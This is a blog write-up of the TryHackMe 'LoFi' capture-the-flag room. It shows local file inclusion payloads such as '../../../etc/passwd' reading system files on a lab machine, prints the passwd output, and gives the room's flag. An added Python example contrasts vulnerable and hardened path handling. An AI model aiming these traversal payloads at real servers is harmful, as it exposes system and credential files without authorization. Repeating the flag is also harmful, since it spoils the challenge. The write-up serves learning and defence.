TryHackMe - LoFi

Lo-Fi

Want to hear some lo-fi beats, to relax or study to? We’ve got you covered!

About

Access this challenge by deploying both the vulnerable machine by pressing the green “Start Machine” button located within this task, and the TryHackMe AttackBox by pressing the “Start AttackBox” button located at the top-right of the page.

Navigate to the following URL using the AttackBox: https://MACHINE_IP and find the flag in the root of the filesystem.

Note: The web page does load some elements from external sources. However, they do not interfere with the completion of the room.

Enumeration

As I had some basic knowledge of LFI, as soon as I got the IP, I tried the payload ../etc/passwd

I usually try to brute-force it for some time; this time I succeeded on my 3rd try, ../../../etc/passwd, and got the output.

root:x:0:0:root:/root:/bin/bash 
daemon:x:1:1:daemon:/usr/sbin:/bin/sh 
bin:x:2:2:bin:/bin:/bin/sh 
sys:x:3:3:sys:/dev:/bin/sh 
sync:x:4:65534:sync:/bin:/bin/sync 
games:x:5:60:games:/usr/games:/bin/sh 
man:x:6:12:man:/var/cache/man:/bin/sh 
lp:x:7:7:lp:/var/spool/lpd:/bin/sh 
mail:x:8:8:mail:/var/mail:/bin/sh 
news:x:9:9:news:/var/spool/news:/bin/sh 
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh 
proxy:x:13:13:proxy:/bin:/bin/sh 
www-data:x:33:33:www-data:/var/www:/bin/sh 
backup:x:34:34:backup:/var/backups:/bin/sh 
list:x:38:38:Mailing List Manager:/var/list:/bin/sh 
irc:x:39:39:ircd:/var/run/ircd:/bin/sh 
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh

So I understood there is only one user with /bin/bash.

So I tried to read flag.txt using the payload ../../../flag.txt, and surprisingly I got the flag.

Flag = flag{e4478e0eab69bd642b8238765dcb7d18}

In most cases an LFI vulnerability leads to RCE; even on this machine we could have done the same and escalated our privileges to root. But this room is limited to just the flag. We can still try for our curiosity! Lemme do that some other time. ;)
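
An added example, not part of the original post or the room's code: it shows why the payloads above resolve outside the web directory when user input is joined to a base path unchecked, and a containment check that rejects them. The base directory /var/www/html and the page name relax.php are assumptions made for illustration.

```python
import posixpath

# Assumption: pages are served from this directory (the post does not name
# the real web root). It is three levels deep, so three "../" reach "/".
BASE_DIR = "/var/www/html"

# Payloads quoted in the post, plus one constructed legitimate page name.
SAMPLES = ["relax.php", "../etc/passwd", "../../../etc/passwd", "../../../flag.txt"]


def naive_resolve(page: str) -> str:
    """Vulnerable pattern: user input is joined to the base with no check."""
    return posixpath.normpath(posixpath.join(BASE_DIR, page))


def safe_resolve(page: str) -> str:
    """Hardened pattern: normalise first, then require the result to stay
    inside BASE_DIR. On a live system use os.path.realpath instead of
    normpath so that symlinks are resolved before the comparison."""
    if "\x00" in page:
        raise ValueError("NUL byte in path")
    candidate = posixpath.normpath(posixpath.join(BASE_DIR, page))
    # commonpath compares whole components, so /var/www/html2 does not pass.
    if posixpath.commonpath([BASE_DIR, candidate]) != BASE_DIR:
        raise ValueError(f"path escapes {BASE_DIR}: {page!r}")
    return candidate


def is_allowed(page: str) -> bool:
    """True when safe_resolve accepts the requested page."""
    try:
        safe_resolve(page)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    for page in SAMPLES:
        verdict = "allowed" if is_allowed(page) else "rejected"
        print(f"{page!r:24} naive -> {naive_resolve(page):22} hardened: {verdict}")
```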

Thanks for reading this easy blog!

This post is licensed under CC BY 4.0 by the author.
